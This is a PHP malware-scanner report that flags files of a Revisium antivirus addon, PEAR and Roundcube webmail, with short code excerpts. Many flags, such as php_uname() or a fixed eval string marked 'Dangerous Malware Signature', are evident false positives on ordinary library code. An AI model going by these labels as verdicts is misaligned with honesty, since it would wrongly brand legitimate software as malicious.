//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Helper.php Size: 3.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/ProfilingXHprof.php Size: 4.36 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Task.php Size: 14.10 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/FileHelper.php Size: 11.97 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Cleaner.php Size: 7.38 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/TaskParams.php Size: 3.44 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Locker.php Size: 5.27 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/WorkerList.php Size: 2.19 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Cli.php Size: 8.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Filter.php Size: 3.69 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Cache.php Size: 4.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/KeyValueStorage.php Size: 7.53 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Log.php Size: 5.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/HTTPHelper.php Size: 7.04 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function str_rot13 exec_str_rot13 Line: 15 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
rkrP
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/autoload.php Size: 2.78 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/autoload.php Size: 3.45 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/ra_php_wrapper.php Size: 5.32 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 1
| Description | Match |
|---|
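Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru]. Whether this call is a problem depends on how `$cmd` is built, which the excerpt does not show. The excerpt does show getPrettyXML() writing to a file in /tmp whose name comes from crc32(time() . rand(1, 100000)), which is guessable; DOMDocument::saveXML() returns the same string without a temporary file. |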
passthru($cmd); function getStdin() { $stdin = ''; $f = @fopen('php://stdin', 'r'); while($line = fgets($f)) { $stdin .= $line; } fclose($f); return $stdin; } function getPrettyXML($xml_str) { $file_name = '/tmp/tmp_xml' . crc32(time() . rand(1, 100000)) . '.xml'; $domxml = new DOMDocument('1.0'); $domxml->preserveWhiteSpace = false; $domxml->formatOutput = true; $domxml->loadXML($xml_str); $domxml->save($file_name); $xmlp = file_get_contents($file_name); unlink($file_name); return $xmlp; } func...
|
|
//usr/share/pear/PEAR.php Size: 33.10 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
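Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]. In the excerpt the evaluated string is a fixed single-quoted literal, so no outside data is interpolated into the code passed to eval. |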
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { return get_class($this); } function getUserInfo() { return $this->userinfo; } function getDebugInfo() { return $this->getUserInfo(); } function getBacktrace($frame = null) { if (defined('PE...
|
|
//usr/share/pear/Net/LDAP2/Search.php Size: 18.69 kB Created: 2015-02-24 15:07:11 Modified: 2020-07-22 14:48:06 Warns: 1
| Description | Match |
|---|
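Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]. Here the evaluated string interpolates `$sort_params`; the risk depends on whether that value can carry caller-supplied text, which the excerpt does not show. |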
eval("array_multisort($sort_params \$to_sort);"); } return $to_sort; } public function sorted($attrs = array('cn'), $order = SORT_ASC) { $return = array(); $sorted = $this->sorted_as_struct($attrs, $order); if (PEAR::isError($sorted)) { return $sorted; } foreach ($sorted as $key => $row) { $entry = $this->_ldap->getEntry($row['dn'], $this->searchedAttrs()); if (!PEAR::isError($entry)) { array_push($return, $entry); } else { return $entry; } } return $return; } public function as_struct() { $retu...
|
|
//usr/share/pear/PEAR/Autoloader.php Size: 6.41 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a,&$b', '$b = strtolower($b);')); $this->_autoload_map = array_merge($this->_autoload_map, $method); } else { $this->_autoload_map[strtolower($method)] = $classname; } } function removeAutoload($method) { $method = strtolower($method); $ok = isset($this->_autoload_map[$method]); unset($this->_autoload_map[$method]); return $ok; } function addAggregateObject($classname) { $classname = strtolower($classname); if (!class_exists($classname)) { $include_file = preg_replace('/[^a-z0-...
|
|
//usr/share/pear/PEAR/Builder.php Size: 16.42 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//usr/share/pear/PEAR/Dependency2.php Size: 49.33 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 277 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/PEAR/Downloader.php Size: 65.02 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return strtolower($a);'); array_walk($this->_installed[$key], $strtolower); } } } function discover($channel) { $this->log(1, 'Attempting to discover channel "' . $channel . '"...'); PEAR::pushErrorHandling(PEAR_ERROR_RETURN); $callback = $this->ui ? array(&$this, '_downloadCallback') : null; if (!class_exists('System')) { require_once 'System.php'; } $tmpdir = $this->config->get('temp_dir'); $tmp = System::mktemp('-d -t "' . $tmpdir . '"'); $a = $this->downloadHttp('http:/...
|
|
//usr/share/pear/PEAR/DependencyDB.php Size: 23.80 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 478 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/PEAR/Registry.php Size: 74.29 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return !empty($a);'); } $package = is_array($package) ? array(strtolower($package[0]), strtolower($package[1])) : strtolower($package); $pkgs = array(); foreach ($path as $name => $attrs) { if (is_array($attrs)) { if (isset($attrs['install-as'])) { $name = $attrs['install-as']; } if (!in_array($attrs['role'], PEAR_Installer_Role::getInstallableRoles())) { continue; } if (!in_array($attrs['role'], PEAR_Installer_Role::getBaseinstallRoles())) { $attrs['baseinstalldir'] = is_a...
| Sign 963e968a Line: 817 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/PEAR/RunTest.php Size: 35.38 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes); } else { $proc = proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); } if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; $e = $w = null; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//usr/share/pear/PEAR/Installer.php Size: 69.09 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//usr/share/pear/PEAR/Command/Registry.php Size: 45.26 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a', 'return join(" = ",$a);'), $info[$key][$i]); $info[$key][$i] = implode(', ', $info[$key][$i]); } $info[$key] = implode("\n", $info[$key]); break; } default: { $info[$key] = implode(", ", $info[$key]); break; } } } if ($key == '_lastmodified') { $hdate = date('Y-m-d', $info[$key]); unset($info[$key]); $info['Last Modified'] = $hdate; } elseif ($key == '_lastversion') { $info['Previous Installed Version'] = $info[$key] ? $info[$key] : '- None -'; unset($info[$key]); } else { ...
|
|
//usr/share/pear/PEAR/PackageFile/v2.php Size: 68.07 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $my), 'package.xml 2.0 has unmatched extra maintainers "%handles%"'); } if ($yours) { array_walk($yours, create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $yours), 'package.xml 1.0 has unmatched extra maintainers "%handles%"'); } } function _differentNotes($notes) { $truncnotes = strlen($notes) < 25 ? $notes : substr($note...
|
|
//usr/share/pear/PEAR/ErrorStack.php Size: 33.17 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && count($err['pa...
|
|
//usr/share/pear/pearcmd.php Size: 14.09 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 383 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/Archive/Tar.php Size: 65.37 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); $v_uname = $userinfo['name']; $v_gname = $groupinfo['name']; } else { $v_uname = ''; $v_gname = ''; } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack("a100a8a8a8a12a12", $v_reduce_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime); $v_binary_data_last = pack("a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_devmajor, $v_devminor, $v_prefix, ...
|
|
//usr/share/pear/Auth/SASL/SCRAM.php Size: 12.25 kB Created: 2014-01-15 18:36:39 Modified: 2020-07-22 14:48:06 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$data', 'return hash("' . $hashes[$hash] . '", $data, TRUE);'); $this->hmac = create_function('$key,$str,$raw', 'return hash_hmac("' . $hashes[$hash] . '", $str, $key, $raw);'); } elseif ($hash == 'md5') { $this->hash = create_function('$data', 'return md5($data, true);'); $this->hmac = array($this, '_HMAC_MD5'); } elseif (in_array($hash, array('sha1', 'sha-1'))) { $this->hash = create_function('$data', 'return sha1($data, true);'); $this->hmac = array($this, '_HMAC_SHA1'); } el...
|
|
//usr/share/pear/OS/Guess.php Size: 10.70 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 20 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 20 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//usr/share/roundcubemail/program/include/rcmail_output_html.php Size: 88.23 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 2
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ($expression);"); } protected function parse_variable($type, $name) { $value = ''; switch ($type) { case 'env': $value = $this->env[$name]; break; case 'config': $value = $this->config->get($name); if (is_array($value) && $value[$_SESSION['storage_host']]) { $value = $value[$_SESSION['storage_host']]; } break; case 'request': $value = rcube_utils::get_input_value($name, rcube_utils::INPUT_GPC); break; case 'session': $value = $_SESSION[$name]; break; case 'cookie': $value = htmlspec...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec('svn info'), $regs)) $ver .= ' [SVN r'.$regs[1].']'; } else if (is_file(RCUBE_INSTALL_PATH . '.git/index')) { if (preg_match('/Date:\s+([^\n]+)/', @shell_exec('git log -1'), $regs)) { if ($date = date('Ymd.Hi', strtotime($regs[1]))) { $ver .= ' [GIT '.$date.']'; } } } $content = html::quote($ver); } else if ($object == 'steptitle') { $content = html::quote($this->get_pagetitle(false)); } else if ($object == 'pagetitle') { $content = html::quote($this->get_pagetitle()); } else if ($obj...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube.php Size: 53.60 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 3
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $args = func_get_args(); $cmd = array_shift($args); $values = $replacements = array(); foreach ($args as $arg) { $values += (array)$arg; } preg_match_all('/({(-?)([a-z]\w*)})/', $cmd, $matches, PREG_SET_ORDER); foreach ($matches as $tags) { list(, $tag, $option, $key) = $tags; $parts = array(); if ($option) { foreach ((array)$values["-$key"] as $key => $value) { if ($value === true || $value === false || $value === null) { $parts[] = $value ? $key : ""; } else { foreach ((array)$value a...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($cmd); } public static function console() { $args = func_get_args(); if (class_exists('rcube', false)) { $rcube = self::get_instance(); $plugin = $rcube->plugins->exec_hook('console', array('args' => $args)); if ($plugin['abort']) { return; } $args = $plugin['args']; } $msg = array(); foreach ($args as $arg) { $msg[] = !is_string($arg) ? var_export($arg, true) : $arg; } self::write_log('console', implode(";\n", $msg)); } public static function write_log($name, $line) { if (!is_string(...
| Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($prio, $line); } if ($log_driver == 'stdout') { $stdout = "php://stdout"; $line = "$name: $line\n"; return file_put_contents($stdout, $line, FILE_APPEND) !== false; } $line = sprintf("[%s]: %s\n", $date, $line); if (self::$instance && self::$instance->config->get('per_user_logging') && self::$instance->get_user_id() && !in_array($name, array('userlogins', 'sendmail')) ) { $log_dir = self::$instance->get_user_log_dir(); if (empty($log_dir) && $name !== 'errors') { return false; } } if (emp...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_image.php Size: 17.39 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($convert . ' 2>&1 -flatten -auto-orient -colorspace sRGB -strip' . ' -quality {quality} -resize {size} {intype}:{in} {type}:{out}', $p); } else { try { $image = new Imagick($this->image_file); try { $image->setImageBackgroundColor('white'); $image->setImageAlphaChannel(11); $image->mergeImageLayers(Imagick::LAYERMETHOD_FLATTEN); } catch (Exception $e) { } $image->setImageColorspace(Imagick::COLORSPACE_SRGB); $image->setImageCompressionQuality(75); $image->setImageFormat($type); $image->stri...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_ldap.php Size: 77.44 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ($code);"); } catch (ParseError $e) { } if ($res === false) { rcube::raise_error(array( 'code' => 505, 'file' => __FILE__, 'line' => __LINE__, 'message' => "Expression parse error on: ($code)"), true, false); continue; } $attrs[$lf] = $res; } else { $attrs[$lf] = preg_replace('/\{\w+\}/', '', strtr($templ, $attrvals)); } } } } private function _ldap2result($rec) { $out = array('_type' => 'person'); $fieldmap = $this->fieldmap; if ($rec['dn']) { $out[$this->primary_key] = self::dn_en...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/bootstrap.php Size: 12.94 kB Created: 2021-06-03 15:35:38 Modified: 2021-06-12 16:03:26 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 41 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_utils.php Size: 47.55 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($command)); unlink($vbscript); return $password; } $command = "/usr/bin/env bash -c 'echo OK'"; if (rtrim(shell_exec($command)) !== 'OK') { echo $prompt; $pass = trim(fgets(STDIN)); echo chr(8)."\r" . $prompt . str_repeat("*", strlen($pass))."\n"; return $pass; } $command = "/usr/bin/env bash -c 'read -s -p \"" . addslashes($prompt) . "\" mypassword && echo \$mypassword'"; $password = rtrim(shell_exec($command)); echo "\n"; return $password; } public static function get_boolean($str) ...
| Sign 11413268 Line: 509 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 471b95ee Line: 510 Dangerous Malware Signature (hash: 471b95ee) |
securityfocus
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_imap_search.php Size: 7.40 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($folders, $str, $charset = null, $sort_field = null, $threading=null) { $start = floor(microtime(true)); $results = new rcube_result_multifolder($folders); foreach ($folders as $folder) { $result = $this->results ? $this->results->get_set($folder) : false; if ($result && !$result->incomplete) { $results->add($result); } else { $search = is_array($str) && $str[$folder] ? $str[$folder] : $str; $job = new rcube_imap_search_job($folder, $search, $charset, $sort_field, $threading); $job->worker ...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/spellchecker/pspell.php Size: 5.31 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec('aspell dump dicts', $dicts); if (!empty($dicts)) { $seen = array(); foreach ($dicts as $lang) { $lang = preg_replace('/-.*$/', '', $lang); $langc = strlen($lang) == 2 ? $lang.'_'.strtoupper($lang) : $lang; if (!$seen[$langc]++) { $langs[] = $lang; } } $langs = array_unique($langs); } else { $langs = $defaults; } return $langs; } private function init() { if (!$this->plink) { if (!extension_loaded('pspell')) { $this->error = "Pspell extension not available"; return; } $this->plink = pspell_...
|
|
//usr/share/roundcubemail/plugins/markasjunk/drivers/cmd_learn.php Size: 4.18 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($tmp_command); if ($debug) { if ($output) { $tmp_command .= "\n$output"; } rcube::write_log('markasjunk', $tmp_command); } if (strpos($command, '%f') !== false) { unlink($tmpfname)
|
|
//usr/share/roundcubemail/plugins/password/password.php Size: 28.80 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:26 Warns: 2
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($pipe); if (!preg_match('/^\{' . $method . '\}/', $crypted)) { return false; } if (!$prefixed) { $prefixed = (bool) $rcmail->config->get('password_dovecotpw_with_method'); } if (!$prefixed) { $crypted = trim(str_replace('{' . $method . '}', '', $crypted)); } $prefixed = false; break; case 'hash': if (!extension_loaded('hash')) { rcube::raise_error(array( 'code' => 600, 'file' => __FILE__, 'line' => __LINE__, 'message' => "Password plugin: 'hash' extension not loaded!" ), true, true); ...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
